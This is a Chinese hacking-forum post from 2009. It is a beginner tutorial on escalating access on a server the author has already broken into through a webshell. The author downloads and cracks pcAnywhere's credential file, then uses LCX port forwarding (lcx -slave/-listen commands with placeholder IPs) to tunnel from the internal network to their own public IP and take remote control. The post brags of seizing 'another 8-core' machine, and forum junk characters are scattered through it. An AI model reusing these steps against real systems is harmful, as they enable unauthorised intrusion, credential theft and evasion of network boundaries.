|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。. ]) `( ]; H3 L9 g, b
! H. u1 A" i6 g; B# U I! n# H提权方法:pcanywhere+LCX$ [3 [0 I1 W$ ?4 ^) r6 a* \
5 V8 {# n3 Y- Q; b+ X6 e: y% K/ g获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。0 E" ~ \0 d. P4 y9 c, C$ _5 R
d' d3 `/ F/ f9 A* c5 \
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
t, v% \% Y3 x7 `& H1 N4 Z* i; ]& B& j
: F- k% N1 @7 @8 y: ~查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。9 x8 W5 L$ i1 X$ A2 m
- m( Q9 A' `$ `
$ g# G9 K7 m8 N) `" v, h呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。) Q$ @8 H0 z3 O
7 W! e: g p3 R1 l. x
' d9 {, c! S K4 Q5 e) e) g, t0 \/ n& g' ^0 }
2 |$ B' A. O( c7 C( y由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``7 g- T: N0 D1 r# m2 ?0 }
1 y/ \+ s' c. p: K% L: D: [
$ b# O$ i( N0 N( i6 h+ lLCX的用法再简单说下:
4 Z: B' W) F( A1 r4 y; R3 s/ p4 n) S. Q2 f( {- ]
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
- Z7 {2 e0 E3 Z0 [% c, c
% N& A1 m# V0 u" J) |7 _4 a& P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
/ G: M L7 t3 s2 Z
9 B- u6 F s' t由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
' q4 {3 y* A! i: |& j# o' o" b顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
4 h- Y7 I7 @: b: V+ L7 Y( C/ x/ O, I+ ^; h2 `
3 g# s2 Z" v2 Y: j z# q. S5 c* @9 P8 A- q+ s# q
. i0 [% e/ v9 n
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。4 c e) N* u" V5 ~* j. y% k' t
3 `# B2 g4 A! M2 o7 R4 [) O
W$ C& e8 X8 _9 ?# e, r' j; R5 Y
& ]& ]4 m- l, H5 R3 Q* g, I/ \; ~0 ]( v7 K9 e
我们本地连接试试,输入我们刚破解的账号密码. i [* B2 w/ P5 D! N
' j0 [: x) S3 v2 \1 V# U
" E- A' x) C! z, ^' m0 j1 f' k
呵呵``连接成功,服务器不错,又一个8核^︵^
; R, ~8 R# P( L% Z t6 Y+ { |1 z, N+ M/ F, b/ @
1 k, S! x( H4 T8 X q0 Q
1 e' g, Q- C ?0 c7 ^; P |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
